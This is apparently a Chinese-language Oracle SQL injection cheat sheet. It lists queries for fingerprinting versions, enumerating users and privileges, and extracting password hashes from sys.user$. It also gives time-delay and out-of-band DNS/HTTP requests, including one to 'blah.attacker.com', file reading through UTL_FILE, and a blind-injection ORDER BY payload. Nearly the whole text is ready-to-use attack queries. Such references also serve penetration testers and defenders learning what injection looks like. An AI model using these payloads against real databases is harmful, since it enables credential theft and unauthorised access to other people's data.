注:下面的一部分查询只能由admin执行,我会在查询的末尾以"-priv“标注。
探测版本:
SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;
SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;
SELECT version FROM v$instance;
注释:
SELECT 1 FROM dual — comment
注: Oracle的SELECT语句必须包含FROM从句,所以当我们并不是真的准备查询一个表的时候,我们必须使用一个假的表名‘dual’
当前用户:
SELECT user FROM dual
列出所有用户:
SELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.user$; — priv
列出密码哈希:
SELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus能够在acct被锁定的状态下给你反馈
SELECT name,spare4 FROM sys.user$ — priv, 11g
密码破解:
checkpwd能够把Oracle8,9,10的基于DES的哈希破解掉
列出权限:
SELECT * FROM session_privs; —当前用户的权限
SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, 列出指定用户的权限
SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, 找到拥有某个权限的用户
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
列出DBA账户:
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, 列出DBA和对应权限
当前数据库:
SELECT global_name FROM global_name;
SELECT name FROM v$database;
SELECT instance_name FROM v$instance;
SELECT SYS.DATABASE_NAME FROM DUAL;
列出数据库:
SELECT DISTINCT owner FROM all_tables; — 列出数据库 (一个用户一个)
– 通过查询TNS监听程序能够查询到其他数据库.详情看tnscmd。
列出字段名:
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;
列出表名:
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
通过字段名找到对应表:
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’;
— 注: 表名都是大写
查询第N行:
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — 查询第9行(从1开始数)
查询第N个字符:
SELECT substr(‘abcd’, 3, 1) FROM dual; — 得到第三个字符‘c’
按位与(Bitwise AND):
SELECT bitand(6,2) FROM dual; — 返回2
SELECT bitand(6,1) FROM dual; — 返回0
ASCII值转字符:
SELECT chr(65) FROM dual; — 返回A
字符转ASCII码:
SELECT ascii(‘A’) FROM dual; — 返回65
类型转换:
SELECT CAST(1 AS char) FROM dual;
SELECT CAST(’1′ AS int) FROM dual;
拼接字符:
SELECT ‘A’ || ‘B’ FROM dual; — 返回AB
IF语句:
BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END;
— 跟SELECT语句在一起时不太管用
Case语句:
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — 返回1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — 返回2
绕过引号:
SELECT chr(65) || chr(66) FROM dual; — 返回AB
延时:
BEGIN DBMS_LOCK.SLEEP(5); END; — priv, 在SELECT中用不了
SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — 如果反查很慢
SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — 如果正查很慢
SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — 如果发送TCP包被拦截或者很慢
— 更多关于延时的内容请看Heavy Queries
发送DNS请求:
SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual;
SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;
命令执行:
如果目标机装了JAVA就能执行命令,看这里
有时候ExtProc也可以,不过我一般都成功不了,看这里
本地文件读取:
UTL_FILE有时候能用。如果下面的语句没有返回null就行。
SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;
JAVA能用来读取和写入文件,除了Oracle Express
主机名称、IP地址:
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT host_name FROM v$instance;
SELECT UTL_INADDR.get_host_address FROM dual; — 查IP
SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — 查主机名称
定位DB文件:
SELECT name FROM V$DATAFILE;
默认系统和数据库:
SYSTEM
SYSAUX
额外小贴士:
一个字符串列出所有表名:
select rtrim(xmlagg(xmlelement(e, table_name || ‘,’)).extract(‘//text()’).extract(‘//text()’) ,’,') from all_tables
– 当你union联查注入的时候只有一行能用与返回数据时使用
盲注排序:
order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = ‘a’ and rownum = 1)=1) then column_name1 else column_name2 end
— 你必须知道两个拥有相同数据类型的字段名才能用